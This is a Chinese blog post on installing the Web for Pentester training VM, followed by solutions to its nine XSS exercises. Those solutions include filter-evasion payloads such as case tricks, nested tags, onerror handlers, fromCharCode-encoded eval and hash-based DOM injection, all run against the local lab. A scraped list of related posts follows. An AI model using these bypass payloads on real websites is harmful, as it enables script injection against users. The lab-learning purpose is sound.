【web安全】第三弹:web攻防平台pentester安装及XSS部分答案解析
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。
下载链接及文档说明:
http://pentesterlab.com/exercises/web_for_pentester/
【安装流程】
1. 虚拟机中挂载镜像。 下载好ios镜像之后,在虚拟机中创建新系统。
一路向下,创建虚拟系统。
点击启动,选择iso镜像,即可启动。
2. 设置网络。 关掉刚刚开启的系统。
点击设置,选择网络选项。如图所示设置网络
3.启动系统。输入ifconfig
可以看到我们虚拟机的IP地址为http://192.168.56.101/ 不同的系统可能不一样
如果想让主机访问虚拟机,必须让主机和虚拟机在同一网段的范围内。
所以在主机上打开网络和共享中心,设置IP
根据我的虚拟机IP,我给本机设置的IP如下:
4.在主机浏览器输入虚拟机IP,我这儿是http://192.168.56.101/ ,即可通过HTTP访问虚拟机了!!
【XSS部分解析】
xss example1:
完全没有过滤或者编码,各种姿势的玩~
name=<script>alert('bb')</script>
xss example2:
从这里可以看到,过滤掉了<script>标签,我们试试大小写?
name=<Script>alert('bb')</sCript>
嗯,大小写绕过了
xss example3:
和上一张图一样,<script>标签被过滤掉了
先试试 name=la<script>la,输出hello,lala
name=<scri<script>pt>alert('bb')</scri</script>pt>
经测试这个在实例2也是可以用的
xss example4:
先输入最基本的测试name=<script>alert('bb')</script>
竟然输出error了!
换个标签? name=<img>?这次没error。补全补全~
name=<img src="1" οnerrοr="alert('bb')">
成功了~~经测试这个payload在前三个应该也是可以的
xss example5:
先输入name=<img>正常显示
补全name=<img src="1" οnerrοr="alert('bb')"> 输出error
发现alert被过滤掉了- -但是其他的函数还可以用,
比如说name=<img src="1" οnerrοr="confirm('aa')">
查了一下文档,发现可以这样写
name=<img src="1" οnerrοr="eval(String.fromCharCode(97,108,101,114,116,40,39,97,39,41))">
这个世界真神奇
xss example6:
查看元素,发现输出竟然在script标签中。
$a="<img src="1" οnerrοr="alert('bb')">"
输出在script标签中的情况要首先闭合双引号"
name=fdf";alert($a);//
xss example7:
审查元素:
<script>
var $a= 'fdf";alert($a);//';
</script>
发现双引号被HTMLEncode了
- -还发现$a=''这个地方变成了单引号。。。稍微改一下
name=fdf';alert($a);//
成了
xss example8:
呦,终于长进了,变成存储型的了~
随便输出个名字<script>alert('a')</script>
审查元素
HELLO <script>alert('a')</script>
<>被HTMLEncode了。
对于输出在HTML中的内容,这样的过滤已经是足够了。那么漏洞在哪儿呢?
经过答案的提醒- -我们发现form表的目标URL是可以被构造的
http://192.168.56.101/xss/example8.php/%22%20οnsubmit=%22alert('1')
在提交的时候,会触发弹窗
xss example9:
- -最后一个你是在逗我么
审查元素
<script>
document.write(location.hash.substring(1));
</script>
随便改改就好了。。http://192.168.56.101/xss/example9.php#<script>alert('1')</script>
注:官方答案地址:http://files.pentesterlab.com/web_for_pentester/web_for_pentester.pdf
转载于:https://www.cnblogs.com/kuoaidebb/p/4002348.html
【web安全】第三弹:web攻防平台pentester安装及XSS部分答案解析相关推荐
- php三种web开发技术,三种WEB开发主流技术ASP-PHP-JSP的评价
三种Web开发主流技术ASP-PHP-JSP的评价 [摘要]本文从程序开发者的角度,对现今社会盛行的WEB开发技术进行了分析,旨在让WEB 开发人员.使用者.准备学习的人对WEB开发技术有更加深入的了 ...
- 三、Zstack云平台快速安装与初始化(ZCCT云计算认证)
一.如何准备安装环境,包括服务器.安装包及相关教程 1.准备安装环境 服务器环境准备 正式环境推荐服务器配置如下: 因为是学习安装,所以创建一个4C8GB,硬盘不小于40G的虚拟机即可.下图是官方视频 ...
- 解析时分秒_三年级上册,数学期中复习卷(含详细答案解析),有效提分,收藏...
三年级上册,数学期中复习卷(含详细答案解析),有效提分,收藏 今天我们来梳理一下三年级上册数学的期中复习. 在第一单元<时分秒>中,关于时间的知识,同学们在小学一二年级都有所学习,一年级阶 ...
- 南京邮电大学网络攻防平台WriteUP——WEB(上)
前言 南京邮电大学网络攻防平台(http://ctf.nuptsast.com/)是一个集合了WEB.MISC.密码学.PWN.逆向的一个CTF训练平台,对于初次涉及ctf小伙伴来说是非常不错的一个训 ...
- 猿人学web端爬虫攻防平台第七题动态字体
本人呢很喜欢爬虫,但是技术不好,所以呢就一直慢慢的摸索着,也不知道那什么练手进行学习,直到我在偶然的机会接触到了猿人学,发现了 猿人学web端爬虫攻防平台这个网站,久旱逢甘霖,他乡遇故知呀(蹩脚的词语 ...
- W3AF:一个web应用安全的攻击、审计平台
现在再给大家介绍一款GUI版WEB安全工具,W3AF是一个web应用安全的攻击.审计平台,通过增加插件来对功能进行扩展,这是一款用python写的工具,支持GUI,也支持命令行模式. W3AF目前已经 ...
- Web安全Day1 - SQL注入实战攻防
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 http ...
- 减少企业Web威胁的三条预防性措施
减少企业Web威胁的三条预防性措施 http://netsecurity.51cto.com 2010-10-20 09:39 佚名 TT安全 我要评论(0) 摘要:在企业中我们更应该关注网络 ...
- Web前端第三阶段--DOM
Web前端第三阶段–DOM 文章目录 Web前端第三阶段--DOM DOM树 初识DOM DOM作用 固定元素的读取 标签读取元素 CSS选择器读取元素 class操作 classList 简单实例 ...
最新文章
- SpringBoot中@ControlAdvice的使用
- 2016年CCPC/ICPC比赛总结
- JAVA框架Struts2
- 认证授权方案之授权初识
- python对列表中的字典的字段进行排序
- 【白皮书分享】2020中国美颜消费趋势白皮书.pdf(附下载链接)
- 记录.NET Core部署到Linux之.NET Core环境搭建(1)
- ubuntu14.04下svn版本管理系统的安装及常用命令的使用整理
- c语言例题22:日期计算
- Android :安卓学习笔记之 Handler机制 的简单理解和使用
- 在React中使用Shadow DOM
- error:crosses initialization of
- 景点门票销售系统系统java_《基于WEB的景点门票销售系统》.doc
- linux dbm数据库,linux dbm数据库
- 163邮箱登录入口你知道吗?163邮箱登录方法大全
- java递归处理单位人员组织机构树
- C/C++中argv[ ]与argc内容解读//(涉及运用cmd)
- 工厂生产线设备数据采集方法
- 智慧城市App解决方案
- 完善三维全栈产品布局 的卢深视用三维全栈技术点亮2020全球智博会
热门文章
- 鼠标右键转圈圈_win10系统右键一直转圈
- 【JQuery】 触发元素的change事件
- Tomcat9 无法启动组件[Connector[AJP/1.3-8009]]
- 【mysql】str_to_date()字符串转化为日期类型
- android oom 检测工具,Android中UI检测、内存泄露、OOM、等优化处理
- android使组件居中,Android图文居中显示控件使用方法详解
- php 打印函数调用栈,利用backtrace和backtrace_symbols函数打印调用栈信息
- 亲手完成4大企业实战项目,挑战Python全栈高薪岗位!
- java ubuntu 14.04,ubuntu14.04下安装JAVA
- python卸载不了怎么办说目录有错_错误:无法在安装目录中创建或删除文件